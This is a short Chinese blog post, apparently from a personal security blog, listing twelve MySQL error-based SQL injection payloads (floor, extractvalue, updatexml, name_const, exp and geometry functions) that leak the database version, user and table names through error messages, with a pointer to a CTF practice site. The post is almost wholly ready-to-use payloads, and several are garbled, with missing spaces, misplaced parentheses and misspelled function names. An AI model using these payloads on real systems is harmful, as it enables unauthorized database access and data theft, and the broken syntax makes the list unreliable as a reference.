SQL 报错注入

参考链接:SQL报错注入十二个函数

SQL报错注入的十二个函数

0x01 floor报错

1
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

0x02 ExtractValue报错

1
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

0x03 UpdateXml报错

1
and 1=(updatexml(1,concat(0x3a,(select user())),1))

0x04 NAME_CONST报错

1
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

0x05 join报错

1
select * from(select * from mysql.user ajoin mysql.user b)c;

0x06 exp报错

1
and exp(~(select * from (select user () ) a) );

0x07 GeometryCollection()报错

1
and GeometryCollection(()select *from(select user () )a)b );

0x08 polygon()报错

1
and polygon (()select * from(select user ())a)b );

0x09 multipoint()报错

1
and multipoint (()select * from(select user() )a)b );

0x10 multlinestring()报错

1
and multlinestring (()select * from(selectuser () )a)b );

0x11 multpolygon()报错

1
and multpolygon (()select * from(selectuser () )a)b );

0x12 linestring()报错

1
and linestring (()select * from(select user() )a)b );

bugku上有个很好的测试平台 http://www.bugku.com/thread-152-1-1.html

本文标题:SQL 报错注入

文章作者:Mr1.Grim

发布时间:2018年07月06日 - 13时24分

最后更新:2018年07月06日 - 18时43分

原始链接:http://yoursite.com/2018/07/06/sql报错注入/

许可协议: "署名-非商用-相同方式共享 3.0" 转载请保留原文链接及作者。

文章目录
  1. 1. SQL报错注入的十二个函数
    1. 1.1. 0x01 floor报错
    2. 1.2. 0x02 ExtractValue报错
    3. 1.3. 0x03 UpdateXml报错
    4. 1.4. 0x04 NAME_CONST报错
    5. 1.5. 0x05 join报错
    6. 1.6. 0x06 exp报错
    7. 1.7. 0x07 GeometryCollection()报错
    8. 1.8. 0x08 polygon()报错
    9. 1.9. 0x09 multipoint()报错
    10. 1.10. 0x10 multlinestring()报错
    11. 1.11. 0x11 multpolygon()报错
    12. 1.12. 0x12 linestring()报错
,